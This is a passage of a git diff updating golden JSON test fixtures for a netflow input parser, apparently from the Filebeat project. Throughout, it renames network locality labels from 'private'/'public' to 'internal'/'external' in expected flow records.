@@ -194,7 +194,7 @@ }, "flow": { "id": "NF1W3jyrHAA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -230,7 +230,7 @@ }, "source": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:8d:af:c3", "port": 123 } @@ -244,7 +244,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 80 }, @@ -261,7 +261,7 @@ }, "flow": { "id": "B-_-kE8PEgA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -297,7 +297,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59157 } @@ -311,7 +311,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59157 }, @@ -328,7 +328,7 @@ }, "flow": { "id": "B-_-kE8PEgA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -364,7 +364,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 80 } @@ -378,7 +378,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 443 }, @@ -395,7 +395,7 @@ }, "flow": { "id": "q6jss8DvXWE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -431,7 +431,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59158 } @@ -445,7 +445,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59158 }, 
@@ -462,7 +462,7 @@ }, "flow": { "id": "q6jss8DvXWE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -498,7 +498,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 443 } @@ -512,7 +512,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 139 }, @@ -529,7 +529,7 @@ }, "flow": { "id": "3TmuMjQR8Mk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -565,7 +565,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59159 } @@ -579,7 +579,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59159 }, @@ -596,7 +596,7 @@ }, "flow": { "id": "3TmuMjQR8Mk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -632,7 +632,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 139 } @@ -646,7 +646,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 23 }, @@ -663,7 +663,7 @@ }, "flow": { "id": "2KDgFVtVKGg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -699,7 +699,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59160 } @@ -713,7 +713,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59160 }, 
@@ -730,7 +730,7 @@ }, "flow": { "id": "2KDgFVtVKGg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -766,7 +766,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 23 } @@ -780,7 +780,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 995 }, @@ -797,7 +797,7 @@ }, "flow": { "id": "vwr6dNcr6FE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -833,7 +833,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59161 } @@ -847,7 +847,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59161 }, @@ -864,7 +864,7 @@ }, "flow": { "id": "vwr6dNcr6FE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -900,7 +900,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 995 } @@ -914,7 +914,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 443 }, @@ -931,7 +931,7 @@ }, "flow": { "id": "tmgCubSF_CU", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -967,7 +967,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59162 } @@ -981,7 +981,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59162 }, 
@@ -998,7 +998,7 @@ }, "flow": { "id": "tmgCubSF_CU", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1034,7 +1034,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 443 } @@ -1048,7 +1048,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 135 }, @@ -1065,7 +1065,7 @@ }, "flow": { "id": "Agzgga7RAr0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1101,7 +1101,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59163 } @@ -1115,7 +1115,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59163 }, @@ -1132,7 +1132,7 @@ }, "flow": { "id": "Agzgga7RAr0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1168,7 +1168,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 135 } @@ -1182,7 +1182,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 110 }, @@ -1199,7 +1199,7 @@ }, "flow": { "id": "-cqFlm16mLc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1235,7 +1235,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59164 } @@ -1249,7 +1249,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59164 }, 
@@ -1266,7 +1266,7 @@ }, "flow": { "id": "-cqFlm16mLc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1302,7 +1302,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 110 } @@ -1316,7 +1316,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 111 }, @@ -1333,7 +1333,7 @@ }, "flow": { "id": "Txfldw7-948", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1369,7 +1369,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59165 } @@ -1383,7 +1383,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59165 }, @@ -1400,7 +1400,7 @@ }, "flow": { "id": "Txfldw7-948", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1436,7 +1436,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 111 } @@ -1450,7 +1450,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 143 }, @@ -1467,7 +1467,7 @@ }, "flow": { "id": "iaXg6w051Ho", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1503,7 +1503,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59166 } @@ -1517,7 +1517,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59166 }, 
@@ -1534,7 +1534,7 @@ }, "flow": { "id": "iaXg6w051Ho", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1570,7 +1570,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 143 } @@ -1584,7 +1584,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 3389 }, @@ -1601,7 +1601,7 @@ }, "flow": { "id": "cEvEMCFhKJk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1637,7 +1637,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59167 } @@ -1651,7 +1651,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59167 }, @@ -1668,7 +1668,7 @@ }, "flow": { "id": "cEvEMCFhKJk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1704,7 +1704,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 3389 } @@ -1718,7 +1718,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 80 }, @@ -1735,7 +1735,7 @@ }, "flow": { "id": "DnN0kX-gR3Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1771,7 +1771,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59168 } @@ -1785,7 +1785,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59168 }, 
@@ -1802,7 +1802,7 @@ }, "flow": { "id": "DnN0kX-gR3Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1838,7 +1838,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 80 } @@ -1852,7 +1852,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 25 }, @@ -1869,7 +1869,7 @@ }, "flow": { "id": "-kLcuxmRzgk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1905,7 +1905,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59169 } @@ -1919,7 +1919,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59169 }, @@ -1936,7 +1936,7 @@ }, "flow": { "id": "-kLcuxmRzgk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1972,7 +1972,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 25 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-multiple-netflow-exporters.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-multiple-netflow-exporters.golden.json index 67a9901764b7..4238292f2505 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-multiple-netflow-exporters.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-multiple-netflow-exporters.golden.json @@ -43,7 +43,7 @@ "Fields": { "destination": { "ip": "172.16.32.248", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { 
@@ -62,7 +62,7 @@ }, "flow": { "id": "1E-M5OJg_go", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.248", @@ -108,7 +108,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -122,7 +122,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -141,7 +141,7 @@ }, "flow": { "id": "yMxFd8CW_Ok", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -187,7 +187,7 @@ "source": { "bytes": 76, "ip": "172.16.32.248", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -201,7 +201,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -220,7 +220,7 @@ }, "flow": { "id": "NF1W3jyrHAA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -266,7 +266,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -280,7 +280,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -299,7 +299,7 @@ }, "flow": { "id": "Tw1iOKJ-dfE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -345,7 +345,7 @@ "source": { "bytes": 76, "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -359,7 +359,7 @@ "Fields": { "destination": { "ip": "172.16.32.202", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { 
@@ -378,7 +378,7 @@ }, "flow": { "id": "sNF38-obC7k", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.202", @@ -424,7 +424,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -438,7 +438,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -457,7 +457,7 @@ }, "flow": { "id": "458D6voFu3E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -503,7 +503,7 @@ "source": { "bytes": 76, "ip": "172.16.32.202", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -534,7 +534,7 @@ }, "flow": { "id": "tYpw8DU5u10", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "ff02::1", @@ -586,7 +586,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "port": 65058 }, "event": { @@ -605,7 +605,7 @@ }, "flow": { "id": "zQfsdfKgh-o", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -655,7 +655,7 @@ "source": { "bytes": 200, "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "packets": 2, "port": 22 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-nprobe-DPI-L7.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-nprobe-DPI-L7.golden.json index 25307e840bdf..3e6a1d037191 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-nprobe-DPI-L7.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-nprobe-DPI-L7.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { 
@@ -23,7 +23,7 @@ }, "flow": { "id": "oFN7CMNpOLQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AAAAUg==", @@ -66,7 +66,7 @@ "source": { "bytes": 82, "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "packets": 1, "port": 0 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-template-with-0-length-fields.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-template-with-0-length-fields.golden.json index e0189eebddbc..65a849e632af 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-template-with-0-length-fields.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-template-with-0-length-fields.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "192.168.1.80", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "BSsjrf_TZnk", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.80", @@ -76,7 +76,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -90,7 +90,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -109,7 +109,7 @@ }, "flow": { "id": "R1Sjz_ITbgo", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -159,7 +159,7 @@ "source": { "bytes": 0, "ip": "192.168.1.80", - "locality": "private", + "locality": "internal", "packets": 0, "port": 0 } @@ -173,7 +173,7 @@ "Fields": { "destination": { "ip": "192.168.1.95", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -192,7 +192,7 @@ }, "flow": { "id": "FpUgB2PIhjQ", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.95", 
@@ -242,7 +242,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -256,7 +256,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -275,7 +275,7 @@ }, "flow": { "id": "qN8iQExOvkc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -325,7 +325,7 @@ "source": { "bytes": 32, "ip": "192.168.1.95", - "locality": "private", + "locality": "internal", "packets": 1, "port": 0 } @@ -339,7 +339,7 @@ "Fields": { "destination": { "ip": "192.168.1.95", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -358,7 +358,7 @@ }, "flow": { "id": "FpUgB2PIhjQ", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.95", @@ -408,7 +408,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -422,7 +422,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -441,7 +441,7 @@ }, "flow": { "id": "qN8iQExOvkc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -491,7 +491,7 @@ "source": { "bytes": 0, "ip": "192.168.1.95", - "locality": "private", + "locality": "internal", "packets": 0, "port": 0 } @@ -505,7 +505,7 @@ "Fields": { "destination": { "ip": "192.168.1.33", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -524,7 +524,7 @@ }, "flow": { "id": "WuFpyBG1Gt0", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.33", @@ -574,7 +574,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } 
@@ -588,7 +588,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -607,7 +607,7 @@ }, "flow": { "id": "1aysHUs7BpA", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -657,7 +657,7 @@ "source": { "bytes": 32, "ip": "192.168.1.33", - "locality": "private", + "locality": "internal", "packets": 1, "port": 0 } @@ -671,7 +671,7 @@ "Fields": { "destination": { "ip": "192.168.1.33", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -690,7 +690,7 @@ }, "flow": { "id": "WuFpyBG1Gt0", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.33", @@ -740,7 +740,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -754,7 +754,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -773,7 +773,7 @@ }, "flow": { "id": "1aysHUs7BpA", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -823,7 +823,7 @@ "source": { "bytes": 0, "ip": "192.168.1.33", - "locality": "private", + "locality": "internal", "packets": 0, "port": 0 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-valid-01.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-valid-01.golden.json index 5d90c00cc64d..20ea4e61d315 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-valid-01.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-valid-01.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "172.16.32.248", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { 
@@ -26,7 +26,7 @@ }, "flow": { "id": "1E-M5OJg_go", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.248", @@ -72,7 +72,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -86,7 +86,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -105,7 +105,7 @@ }, "flow": { "id": "yMxFd8CW_Ok", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -151,7 +151,7 @@ "source": { "bytes": 76, "ip": "172.16.32.248", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -165,7 +165,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -184,7 +184,7 @@ }, "flow": { "id": "NF1W3jyrHAA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -230,7 +230,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -244,7 +244,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -263,7 +263,7 @@ }, "flow": { "id": "Tw1iOKJ-dfE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -309,7 +309,7 @@ "source": { "bytes": 76, "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -323,7 +323,7 @@ "Fields": { "destination": { "ip": "172.16.32.202", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -342,7 +342,7 @@ }, "flow": { "id": "sNF38-obC7k", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.202", 
@@ -388,7 +388,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -402,7 +402,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -421,7 +421,7 @@ }, "flow": { "id": "458D6voFu3E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -467,7 +467,7 @@ "source": { "bytes": 76, "ip": "172.16.32.202", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -498,7 +498,7 @@ }, "flow": { "id": "tYpw8DU5u10", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "ff02::1", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/ipfix_cisco.pcap.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/ipfix_cisco.pcap.golden.json index b67858c32e43..149355177e94 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/ipfix_cisco.pcap.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/ipfix_cisco.pcap.golden.json @@ -23,7 +23,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -110,7 +110,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -197,7 +197,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACCA==", @@ -284,7 +284,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -371,7 +371,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", 
@@ -458,7 +458,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -545,7 +545,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -632,7 +632,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -719,7 +719,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACYw==", @@ -806,7 +806,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAMQ==", @@ -893,7 +893,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -980,7 +980,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACYw==", @@ -1067,7 +1067,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACCA==", @@ -1154,7 +1154,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -1241,7 +1241,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -1328,7 +1328,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAAQ==", @@ -1415,7 +1415,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -1502,7 +1502,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", 
